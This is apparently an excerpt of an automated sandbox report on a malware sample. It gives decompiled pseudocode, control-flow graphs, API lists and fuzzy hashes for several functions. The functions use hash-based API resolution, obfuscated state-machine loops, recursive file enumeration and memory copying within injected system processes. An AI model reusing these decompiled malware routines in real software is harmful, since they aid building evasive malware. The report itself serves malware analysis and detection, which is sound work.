                                                        • Snapshot File: hcaresult_13_2_310000_ieframe.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$AllocVirtual
                                                        • String ID:
                                                        • API String ID: 1654584625-0
                                                        • Opcode ID: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction ID: ecf3428c2703a9bc2565568e3f25e0d14e6f7735c8a37d337c4523f176a6dfc7
                                                        • Opcode Fuzzy Hash: 33a83c292423e0fbe2e532dbc4518730eee9e5d53c86213deb289c7390d0b434
                                                        • Instruction Fuzzy Hash: FB510370640218ABDB299B54DE46FEAB7B8EF58701F004095FA08BB190D6F89DC5CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 699 3280a0-32815b 700 328163-328168 699->700 701 328170-328175 700->701 702 32817b 701->702 703 328338-32833d 701->703 704 328181-328186 702->704 705 328287-32829b call 3234c0 702->705 706 32836f-328377 703->706 707 32833f-328344 703->707 711 328252-328259 704->711 712 32818c-328191 704->712 728 3282bb-3282e3 705->728 729 32829d-3282b5 call 323f00 call 323e60 705->729 709 328397-3283bb CreateFileW 706->709 710 328379-328391 call 323f00 call 323e60 706->710 713 328346-32834b 707->713 714 328365-32836a 707->714 719 3283ee-3283fa 709->719 720 3283bd-3283c2 709->720 710->709 721 328276-328282 711->721 722 32825b-328271 call 323f00 call 323e60 711->722 723 3281e3-32821a 712->723 724 328193-328198 712->724 715 3283c7-3283ce 713->715 716 32834d-328352 713->716 714->701 732 3283d0-3283e6 call 323f00 call 323e60 715->732 733 3283eb 715->733 716->701 725 328358-328364 716->725 720->701 721->701 722->721 726 328237-32824d 723->726 727 32821c-328232 call 323f00 call 323e60 723->727 724->716 734 32819e-3281e1 call 32b6e0 724->734 726->701 727->726 752 328300-32830b 728->752 753 3282e5-3282fb call 323f00 call 323e60 728->753 729->728 732->733 733->719 734->701 763 328328-328333 752->763 764 32830d-328323 call 323f00 call 323e60 752->764 753->752 763->700 764->763
                                                        C-Code - Quality: 66%
                                                        			E003280A0(signed int __edx) {
                                                        				short _v524;
                                                        				struct _SECURITY_ATTRIBUTES* _v532;
                                                        				intOrPtr _v536;
                                                        				intOrPtr _v540;
                                                        				intOrPtr _v544;
                                                        				intOrPtr _v548;
                                                        				intOrPtr _v552;
                                                        				intOrPtr _v556;
                                                        				intOrPtr _v560;
                                                        				char _v564;
                                                        				intOrPtr _v568;
                                                        				char _v572;
                                                        				struct _SECURITY_ATTRIBUTES* _v576;
                                                        				intOrPtr _v580;
                                                        				signed int _v584;
                                                        				signed int _v588;
                                                        				signed int _v592;
                                                        				signed int _v596;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t58;
                                                        				void* _t64;
                                                        				void* _t66;
                                                        				intOrPtr* _t68;
                                                        				void* _t72;
                                                        				intOrPtr* _t77;
                                                        				intOrPtr* _t79;
                                                        				void* _t81;
                                                        				void* _t82;
                                                        				intOrPtr* _t85;
                                                        				void* _t87;
                                                        				intOrPtr _t88;
                                                        				intOrPtr* _t89;
                                                        				void* _t91;
                                                        				void* _t95;
                                                        				intOrPtr _t100;
                                                        				char _t104;
                                                        				signed int _t121;
                                                        				void* _t124;
                                                        				void* _t126;
                                                        				void* _t127;
                                                        				signed int* _t128;
                                                        				void* _t130;
                                                        
                                                        				_t121 = __edx;
                                                        				_t128 =  &_v596;
                                                        				_v584 = 0x9318;
                                                        				_t58 = 0x343bfd89;
                                                        				_v584 = _v584 ^ 0xde90c338;
                                                        				_v584 = _v584 ^ 0xde905120;
                                                        				_v596 = 0x7d19;
                                                        				_v596 = _v596 << 9;
                                                        				_v596 = _v596 >> 0xe;
                                                        				_v596 = _v596 + 0xffff07e5;
                                                        				_v596 = _v596 | 0x8aea6eef;
                                                        				_v596 = _v596 + 0xd867;
                                                        				_v596 = _v596 + 0x9c41;
                                                        				_v596 = _v596 + 0x3de0;
                                                        				_v596 = _v596 + 0x218b;
                                                        				_v596 = _v596 ^ 0x00014403;
                                                        				_v592 = 0x2591;
                                                        				_t127 = _v584;
                                                        				_t95 = 0;
                                                        				_v592 = _v592 * 0x7d;
                                                        				_v592 = _v592 + 0x8d68;
                                                        				_v592 = _v592 + 0xffff8911;
                                                        				_v592 = _v592 * 0x6a;
                                                        				_v592 = _v592 + 0xffff93d5;
                                                        				_v592 = _v592 ^ 0x07a13cd2;
                                                        				_v588 = 0x789;
                                                        				_v588 = _v588 >> 1;
                                                        				_v588 = _v588 ^ 0xaee58af2;
                                                        				_v588 = _v588 ^ 0xaee58936;
                                                        				while(1) {
                                                        					L1:
                                                        					goto L2;
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t130 = _t58 - 0xea5411f;
                                                        							if(_t130 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t130 == 0) {
                                                        								_t72 = E003234C0(0x32d970);
                                                        								_t121 =  *0x32e158;
                                                        								_t126 = _t72;
                                                        								if(_t121 == 0) {
                                                        									_t121 = E00323E60(_t95, E00323F00(0xc6fbcd74), 0xba71dd03, _t127);
                                                        									 *0x32e158 = _t121;
                                                        								}
                                                        								_t100 =  *0x32e54c; // 0x8fdff0
                                                        								_t50 = _t100 + 0x260; // 0x8fe250
                                                        								_t51 = _t100 + 0x18; // 0x8fe008
                                                        								 *_t121( &_v524, 0x104, _t126, _t51, _t50);
                                                        								_t77 =  *0x32e494;
                                                        								_t128 =  &(_t128[5]);
                                                        								if(_t77 == 0) {
                                                        									_t82 = E00323F00(0x9bab0b12);
                                                        									_t121 = 0x7facde30;
                                                        									_t77 = E00323E60(_t95, _t82, 0x7facde30, _t127);
                                                        									 *0x32e494 = _t77;
                                                        								}
                                                        								_t124 =  *_t77();
                                                        								_t79 =  *0x32df30;
                                                        								if(_t79 == 0) {
                                                        									_t81 = E00323F00(0x9bab0b12);
                                                        									_t121 = 0x5010a54d;
                                                        									_t79 = E00323E60(_t95, _t81, 0x5010a54d, _t127);
                                                        									 *0x32df30 = _t79;
                                                        								}
                                                        								 *_t79(_t124, 0, _t126);
                                                        								_t58 = 0x2c2d24c8;
                                                        								goto L1;
                                                        							} else {
                                                        								if(_t58 == 0x2f64d8b) {
                                                        									_t85 =  *0x32e1d4;
                                                        									if(_t85 == 0) {
                                                        										_t87 = E00323F00(0x9bab0b12);
                                                        										_t121 = 0xa229df38;
                                                        										_t85 = E00323E60(_t95, _t87, 0xa229df38, _t127);
                                                        										 *0x32e1d4 = _t85;
                                                        									}
                                                        									 *_t85( &_v572);
                                                        									_t58 = 0xc5e088d;
                                                        									continue;
                                                        								} else {
                                                        									if(_t58 == 0x6f65414) {
                                                        										_t88 = _v568;
                                                        										_t104 = _v572;
                                                        										_v560 = _t88;
                                                        										_v552 = _t88;
                                                        										_v544 = _t88;
                                                        										_v536 = _t88;
                                                        										_t89 =  *0x32dee4;
                                                        										_v564 = _t104;
                                                        										_v556 = _t104;
                                                        										_v548 = _t104;
                                                        										_v540 = _t104;
                                                        										_v532 = 0;
                                                        										if(_t89 == 0) {
                                                        											_t91 = E00323F00(0x9bab0b12);
                                                        											_t121 = 0x4bf45878;
                                                        											_t89 = E00323E60(_t95, _t91, 0x4bf45878, _t127);
                                                        											 *0x32dee4 = _t89;
                                                        										}
                                                        										 *_t89(_t127, 0,  &_v564, 0x28);
                                                        										_t58 = 0x3557bd8c;
                                                        										_t95 =  !=  ? 1 : _t95;
                                                        										continue;
                                                        									} else {
                                                        										if(_t58 != 0xc5e088d) {
                                                        											goto L24;
                                                        										} else {
                                                        											_v580 = 0xa8c00;
                                                        											_v576 = 0;
                                                        											_v596 = E0032B6E0(_v580, _v576, 0x989680, 0);
                                                        											_v592 = _t121;
                                                        											_v588 = _v588 - _v596;
                                                        											_t58 = 0xea5411f;
                                                        											asm("sbb [esp+0x2c], ecx");
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L35:
                                                        						}
                                                        						if(_t58 == 0x2c2d24c8) {
                                                        							if( *0x32de04 == 0) {
                                                        								_t66 = E00323F00(0x9bab0b12);
                                                        								_t121 = 0xb66d748a;
                                                        								 *0x32de04 = E00323E60(_t95, _t66, 0xb66d748a, _t127);
                                                        							}
                                                        							_t64 = CreateFileW( &_v524, _v584, _v596, 0, _v592, _v588, 0); // executed
                                                        							_t127 = _t64;
                                                        							if(_t127 == 0xffffffff) {
                                                        								goto L34;
                                                        							} else {
                                                        								_t58 = 0x6f65414;
                                                        								goto L2;
                                                        							}
                                                        						} else {
                                                        							if(_t58 == 0x343bfd89) {
                                                        								_t58 = 0x2f64d8b;
                                                        								goto L2;
                                                        							} else {
                                                        								if(_t58 == 0x3557bd8c) {
                                                        									_t68 =  *0x32de3c;
                                                        									if(_t68 == 0) {
                                                        										_t68 = E00323E60(_t95, E00323F00(0x9bab0b12), 0x20de7595, _t127);
                                                        										 *0x32de3c = _t68;
                                                        									}
                                                        									 *_t68(_t127);
                                                        									L34:
                                                        									return _t95;
                                                        								} else {
                                                        									goto L24;
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L35;
                                                        						L24:
                                                        					} while (_t58 != 0xcfe8e);
                                                        					return _t95;
                                                        					goto L35;
                                                        				}
                                                        			}














































                                                        0x003280a0
                                                        0x003280a0
                                                        0x003280a6
                                                        0x003280ae
                                                        0x003280b3
                                                        0x003280bb
                                                        0x003280c3
                                                        0x003280ca
                                                        0x003280ce
                                                        0x003280d2
                                                        0x003280d9
                                                        0x003280e0
                                                        0x003280e7
                                                        0x003280ee
                                                        0x003280f5
                                                        0x003280fc
                                                        0x00328103
                                                        0x00328112
                                                        0x00328116
                                                        0x00328119
                                                        0x0032811d
                                                        0x00328125
                                                        0x00328133
                                                        0x00328137
                                                        0x0032813f
                                                        0x00328147
                                                        0x0032814f
                                                        0x00328153
                                                        0x0032815b
                                                        0x00328163
                                                        0x00328163
                                                        0x00328168
                                                        0x00328170
                                                        0x00328170
                                                        0x00328170
                                                        0x00328170
                                                        0x00328175
                                                        0x00000000
                                                        0x00000000
                                                        0x0032817b
                                                        0x0032828c
                                                        0x00328291
                                                        0x00328297
                                                        0x0032829b
                                                        0x003282b3
                                                        0x003282b5
                                                        0x003282b5
                                                        0x003282bb
                                                        0x003282c1
                                                        0x003282c8
                                                        0x003282d7
                                                        0x003282d9
                                                        0x003282de
                                                        0x003282e3
                                                        0x003282ea
                                                        0x003282ef
                                                        0x003282f6
                                                        0x003282fb
                                                        0x003282fb
                                                        0x00328302
                                                        0x00328304
                                                        0x0032830b
                                                        0x00328312
                                                        0x00328317
                                                        0x0032831e
                                                        0x00328323
                                                        0x00328323
                                                        0x0032832c
                                                        0x0032832e
                                                        0x00000000
                                                        0x00328181
                                                        0x00328186
                                                        0x00328252
                                                        0x00328259
                                                        0x00328260
                                                        0x00328265
                                                        0x0032826c
                                                        0x00328271
                                                        0x00328271
                                                        0x0032827b
                                                        0x0032827d
                                                        0x00000000
                                                        0x0032818c
                                                        0x00328191
                                                        0x003281e3
                                                        0x003281e7
                                                        0x003281eb
                                                        0x003281ef
                                                        0x003281f3
                                                        0x003281f7
                                                        0x003281fb
                                                        0x00328200
                                                        0x00328204
                                                        0x00328208
                                                        0x0032820c
                                                        0x00328210
                                                        0x0032821a
                                                        0x00328221
                                                        0x00328226
                                                        0x0032822d
                                                        0x00328232
                                                        0x00328232
                                                        0x00328241
                                                        0x00328245
                                                        0x0032824a
                                                        0x00000000
                                                        0x00328193
                                                        0x00328198
                                                        0x00000000
                                                        0x0032819e
                                                        0x003281a0
                                                        0x003281a8
                                                        0x003281c4
                                                        0x003281c8
                                                        0x003281d4
                                                        0x003281d8
                                                        0x003281dd
                                                        0x00000000
                                                        0x003281dd
                                                        0x00328198
                                                        0x00328191
                                                        0x00328186
                                                        0x00000000
                                                        0x0032817b
                                                        0x0032833d
                                                        0x00328377
                                                        0x0032837e
                                                        0x00328383
                                                        0x00328391
                                                        0x00328391
                                                        0x003283b4
                                                        0x003283b6
                                                        0x003283bb
                                                        0x00000000
                                                        0x003283bd
                                                        0x003283bd
                                                        0x00000000
                                                        0x003283bd
                                                        0x0032833f
                                                        0x00328344
                                                        0x00328365
                                                        0x00000000
                                                        0x00328346
                                                        0x0032834b
                                                        0x003283c7
                                                        0x003283ce
                                                        0x003283e1
                                                        0x003283e6
                                                        0x003283e6
                                                        0x003283ec
                                                        0x003283f1
                                                        0x003283fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0032834b
                                                        0x00328344
                                                        0x00000000
                                                        0x0032834d
                                                        0x0032834d
                                                        0x00328364
                                                        0x00000000
                                                        0x00328364

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE,?,?), ref: 003283B4
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285132994.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                        • Associated: 0000000D.00000002.2285127081.0000000000320000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285143400.000000000032D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285149670.000000000032F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_320000_ieframe.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: de272bc3ff6f7991cb83dcfbce275f7cdd16f0acf9a49527e72295519d131354
                                                        • Instruction ID: 1725dd3c006c77ec6d172a10e08a4d81bdf819a821df345c3006ef1b217bdb67
                                                        • Opcode Fuzzy Hash: de272bc3ff6f7991cb83dcfbce275f7cdd16f0acf9a49527e72295519d131354
                                                        • Instruction Fuzzy Hash: 7581E2716093109FD72AEF68E84162FB7E9EB94744F10082DF185CB390EB78DD068B92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 75%
                                                        			E00327080(void* __ebx, void* __ecx, signed int __edx, void* __eflags) {
                                                        				struct HINSTANCE__* _t6;
                                                        				intOrPtr* _t7;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr _t17;
                                                        				signed int _t28;
                                                        				void* _t29;
                                                        				WCHAR* _t30;
                                                        				void* _t31;
                                                        
                                                        				_t15 = __ebx;
                                                        				_t28 = __edx;
                                                        				_t30 = E003234C0(__ecx);
                                                        				if( *0x32dd1c == 0) {
                                                        					 *0x32dd1c = E00323E60(__ebx, E00323F00(0x9bab0b12), 0xe4b28d97, _t31);
                                                        				}
                                                        				_t6 = LoadLibraryW(_t30);
                                                        				_t17 =  *0x32e548; // 0x937e08
                                                        				 *(_t17 + 0x30 + _t28 * 4) = _t6;
                                                        				_t7 =  *0x32e494;
                                                        				if(_t7 == 0) {
                                                        					_t7 = E00323E60(_t15, E00323F00(0x9bab0b12), 0x7facde30, _t31);
                                                        					 *0x32e494 = _t7;
                                                        				}
                                                        				_t29 =  *_t7();
                                                        				_t9 =  *0x32df30;
                                                        				if(_t9 == 0) {
                                                        					_t9 = E00323E60(_t15, E00323F00(0x9bab0b12), 0x5010a54d, _t31);
                                                        					 *0x32df30 = _t9;
                                                        				}
                                                        				return  *_t9(_t29, 0, _t30);
                                                        			}











                                                        0x00327080
                                                        0x00327082
                                                        0x00327089
                                                        0x00327092
                                                        0x003270aa
                                                        0x003270aa
                                                        0x003270b0
                                                        0x003270b2
                                                        0x003270b8
                                                        0x003270bc
                                                        0x003270c3
                                                        0x003270d6
                                                        0x003270db
                                                        0x003270db
                                                        0x003270e2
                                                        0x003270e4
                                                        0x003270eb
                                                        0x003270fe
                                                        0x00327103
                                                        0x00327103
                                                        0x00327110

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(00000000,?,3251FEFE,0032721D,003268AC), ref: 003270B0
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285132994.0000000000321000.00000020.00000001.sdmp, Offset: 00320000, based on PE: true
                                                        • Associated: 0000000D.00000002.2285127081.0000000000320000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285143400.000000000032D000.00000004.00000001.sdmp Download File
                                                        • Associated: 0000000D.00000002.2285149670.000000000032F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_320000_ieframe.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 53cc19958cd6d56ec59b4da4f612e2570df980712fc2fb93a052b1ccad526842
                                                        • Instruction ID: bccdbabf55b36b3a5a0ef8e294e850d74c0fee5c4f20626c3ddba346dfca7396
                                                        • Opcode Fuzzy Hash: 53cc19958cd6d56ec59b4da4f612e2570df980712fc2fb93a052b1ccad526842
                                                        • Instruction Fuzzy Hash: 0D01A231B142301B9B27BF7ABC4162B2AAFAFD0B48B11442DA415CF319EE38DD029780
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 00310F08
                                                          • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 00310F3E
                                                          • Part of subcall function 00310FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 00310F7F
                                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,?,?,?), ref: 003102F6
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285120425.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_310000_ieframe.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove$FreeVirtual
                                                        • String ID:
                                                        • API String ID: 223123264-0
                                                        • Opcode ID: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction ID: c345e64d6ee78b2d4929049c9ceb8d3936ec41767ed426ed60b0da7967464ab6
                                                        • Opcode Fuzzy Hash: f2e981a9179681ccb7f8c3dcf060b14378d00665a4bf2a35893dbab2a67e5d97
                                                        • Instruction Fuzzy Hash: 98512AB1900268ABDB28DF64DD85BDEB778EF88700F004599F509BB250DBB45AC5CFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285120425.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_310000_ieframe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Eight$Five$Four$Nine$One$Seven$Six$Ten$Three$Two
                                                        • API String ID: 0-211638553
                                                        • Opcode ID: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction ID: 9c5a9fbf546f129eda169380337c8c4c206647b093047216d9b9db7d4ceccb2e
                                                        • Opcode Fuzzy Hash: 8cc000d8363efb3f459e751a077807d67fb32520a221421634b6d1961bee58a5
                                                        • Instruction Fuzzy Hash: 76313D38E511289BCB08DB98CD80AED7BB5FF4C340B508027D502737A4DB789986CFA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285120425.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_310000_ieframe.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction ID: 674ef3ec3f76404bc691bfbf9305989340648e749e97ae6d1a45497da3b80910
                                                        • Opcode Fuzzy Hash: 0f97f71410d1e41c89ff792c719ec0644fea615ab81a24e4e49035ac14860485
                                                        • Instruction Fuzzy Hash: 2E51B772A083019BD72EDF26D841BDBB3D8ABDC794F04052DF548E7241E2B5D8D48792
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.2285120425.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_310000_ieframe.jbxd
                                                        Similarity
                                                        • API ID: MemoryMove
                                                        • String ID:
                                                        • API String ID: 1951056069-0
                                                        • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction ID: 1b912a9163c8a905ed12dfe4471b8fd6003dcd9d9ab8327c598e9f276794cb1e
                                                        • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                        • Instruction Fuzzy Hash: 32411471A143055BC32DDB29DC45AEBB3D9AFCCB50F09493EF640DA240D2B1D9C887A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Executed Functions

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00401010,00000000,?), ref: 00610448
                                                          • Part of subcall function 00611140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,00610EFD,00000000), ref: 00611155
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00000018,00401010), ref: 00610463
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00610484
                                                        • HeapFree.KERNEL32(00000000,00000001,00000000), ref: 0061048D
                                                        • GetProcessHeap.KERNEL32(?,00401010,00000000,?), ref: 00610492
                                                        • RtlAllocateHeap.NTDLL(00000000,00000001,00401010), ref: 0061049F
                                                        • GetCurrentProcess.KERNEL32(?,00401010,00000000,?), ref: 006104A6
                                                        • NtQueryInformationProcess.NTDLL(00000000,00000000,00000000,00401010,00401010), ref: 006104B9
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000018), ref: 006104E0
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000014), ref: 006104F7
                                                        • RtlMoveMemory.NTDLL(?,00000000,00000014), ref: 00610519
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000024), ref: 00610530
                                                        • RtlMoveMemory.NTDLL(00000000,?,00000048), ref: 00610547
                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000048), ref: 00610562
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2292138449.0000000000610000.00000040.00000001.sdmp, Offset: 00610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_610000_cryptdll.jbxd
                                                        Similarity
                                                        • API ID: MemoryMoveProcess$Heap$CurrentInformationQuery$AllocateFreelstrcpyn
                                                        • String ID:
                                                        • API String ID: 482429597-0
                                                        • Opcode ID: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction ID: 42e7aed4a138fa8b98453f289914240d2a16ca31e724fc8bb93a1f129511882b
                                                        • Opcode Fuzzy Hash: 9b0dd4097f43c0ebb4e34693010eb75d6d5af0ab7a67fa55d809036932efe504
                                                        • Instruction Fuzzy Hash: B44180B19043407EE750EB71C842FEBB2EEAB89740F048D1CB7449B241DAB4D9848B66
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 375 6238f0-62390b 376 623910-623915 375->376 377 62391b 376->377 378 623a69-623a6e 376->378 379 623921-623926 377->379 380 623a5f-623a64 377->380 381 623a70-623a75 378->381 382 623acc-623adf call 6234c0 378->382 383 623a17-623a1e 379->383 384 62392c-623931 379->384 380->376 386 623ab6-623abb 381->386 387 623a77-623a7e 381->387 402 623ae1-623af7 call 623f00 call 623e60 382->402 403 623afc-623b17 382->403 388 623a20-623a36 call 623f00 call 623e60 383->388 389 623a3b-623a4f FindFirstFileW 383->389 391 623b70-623b77 384->391 392 623937-62393c 384->392 386->376 390 623ac1-623acb 386->390 394 623a80-623a96 call 623f00 call 623e60 387->394 395 623a9b-623ab1 387->395 388->389 399 623b97-623ba1 389->399 400 623a55-623a5a 389->400 397 623b94 391->397 398 623b79-623b8f call 623f00 call 623e60 391->398 392->386 401 623942-623947 392->401 394->395 395->376 397->399 398->397 400->376 408 6239f1-623a12 401->408 409 62394d-623953 401->409 402->403 420 623b34-623b3f 403->420 421 623b19-623b2f call 623f00 call 623e60 403->421 408->376 415 623974-623976 409->415 416 623955-62395d 409->416 425 62396d-623972 415->425 427 623978-62398b call 6234c0 415->427 424 62395f-623963 416->424 416->425 440 623b41-623b57 call 623f00 call 623e60 420->440 441 623b5c-623b6b 420->441 421->420 424->415 431 623965-62396b 424->431 425->376 437 6239a8-6239ec call 6238f0 call 623460 427->437 438 62398d-6239a3 call 623f00 call 623e60 427->438 431->415 431->425 437->376 438->437 440->441 441->376
                                                        C-Code - Quality: 63%
                                                        			E006238F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                        				short _v524;
                                                        				char _v1044;
                                                        				short _v1588;
                                                        				intOrPtr _v1590;
                                                        				struct _WIN32_FIND_DATAW _v1636;
                                                        				void* _v1640;
                                                        				intOrPtr _v1652;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t22;
                                                        				intOrPtr* _t24;
                                                        				intOrPtr* _t26;
                                                        				intOrPtr* _t28;
                                                        				intOrPtr* _t33;
                                                        				signed int _t34;
                                                        				void* _t39;
                                                        				intOrPtr* _t42;
                                                        				signed int _t46;
                                                        				intOrPtr* _t50;
                                                        				intOrPtr _t55;
                                                        				void* _t56;
                                                        				void* _t91;
                                                        				void* _t92;
                                                        				void* _t93;
                                                        				void* _t94;
                                                        				void* _t95;
                                                        				void* _t96;
                                                        				void* _t98;
                                                        
                                                        				_t91 = __ecx;
                                                        				_t95 = __edx;
                                                        				_v1640 = __ecx;
                                                        				_t22 = 0x25a25425;
                                                        				_t56 = _v1640;
                                                        				while(1) {
                                                        					L1:
                                                        					_t98 = _t22 - 0x25a25425;
                                                        					if(_t98 > 0) {
                                                        						break;
                                                        					}
                                                        					if(_t98 == 0) {
                                                        						_t22 = 0x29bc40d3;
                                                        						continue;
                                                        					} else {
                                                        						if(_t22 == 0x8a099c9) {
                                                        							if( *0x62e430 == 0) {
                                                        								 *0x62e430 = E00623E60(_t56, E00623F00(0x9bab0b12), 0x83efb111, _t95);
                                                        							}
                                                        							_t39 = FindFirstFileW( &_v524,  &_v1636); // executed
                                                        							_t56 = _t39;
                                                        							if(_t56 == 0xffffffff) {
                                                        								return _t39;
                                                        							} else {
                                                        								_t22 = 0x1a4f9837;
                                                        								continue;
                                                        							}
                                                        						} else {
                                                        							if(_t22 == 0xb46fa16) {
                                                        								_t42 =  *0x62dba4;
                                                        								if(_t42 == 0) {
                                                        									_t42 = E00623E60(_t56, E00623F00(0x9bab0b12), 0xd274268a, _t95);
                                                        									 *0x62dba4 = _t42;
                                                        								}
                                                        								return  *_t42(_t56);
                                                        							}
                                                        							if(_t22 != 0x1a4f9837) {
                                                        								L27:
                                                        								if(_t22 != 0x55fa1f4) {
                                                        									continue;
                                                        								} else {
                                                        									return _t22;
                                                        								}
                                                        							} else {
                                                        								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                                                        									_t46 = _a4( &_v1636, _a8);
                                                        									asm("sbb eax, eax");
                                                        									_t22 = ( ~_t46 & 0x2b8487c8) + 0xb46fa16;
                                                        								} else {
                                                        									if(_v1636.cFileName != 0x2e) {
                                                        										L12:
                                                        										if(_t95 == 0) {
                                                        											goto L11;
                                                        										} else {
                                                        											_t94 = E006234C0(0x62d290);
                                                        											_t50 =  *0x62e158;
                                                        											if(_t50 == 0) {
                                                        												_t50 = E00623E60(_t56, E00623F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        												 *0x62e158 = _t50;
                                                        											}
                                                        											 *_t50( &_v1044, 0x104, _t94, _t91,  &(_v1636.cFileName));
                                                        											E006238F0( &_v1044, _t95, _a4, _a8);
                                                        											_t96 = _t96 + 0x1c;
                                                        											E00623460(_t94);
                                                        											_t22 = 0x36cb81de;
                                                        										}
                                                        									} else {
                                                        										_t55 = _v1590;
                                                        										if(_t55 == 0 || _t55 == 0x2e && _v1588 == 0) {
                                                        											L11:
                                                        											_t22 = 0x36cb81de;
                                                        										} else {
                                                        											goto L12;
                                                        										}
                                                        									}
                                                        								}
                                                        								continue;
                                                        							}
                                                        						}
                                                        					}
                                                        					L40:
                                                        				}
                                                        				if(_t22 == 0x29bc40d3) {
                                                        					_t93 = E006234C0(0x62d260);
                                                        					_t24 =  *0x62e158;
                                                        					if(_t24 == 0) {
                                                        						_t24 = E00623E60(_t56, E00623F00(0xc6fbcd74), 0xba71dd03, _t95);
                                                        						 *0x62e158 = _t24;
                                                        					}
                                                        					 *_t24( &_v524, 0x104, _t93, _t91);
                                                        					_t26 =  *0x62e494;
                                                        					_t96 = _t96 + 0x10;
                                                        					if(_t26 == 0) {
                                                        						_t26 = E00623E60(_t56, E00623F00(0x9bab0b12), 0x7facde30, _t95);
                                                        						 *0x62e494 = _t26;
                                                        					}
                                                        					_t92 =  *_t26();
                                                        					_t28 =  *0x62df30;
                                                        					if(_t28 == 0) {
                                                        						_t28 = E00623E60(_t56, E00623F00(0x9bab0b12), 0x5010a54d, _t95);
                                                        						 *0x62df30 = _t28;
                                                        					}
                                                        					 *_t28(_t92, 0, _t93);
                                                        					_t91 = _v1652;
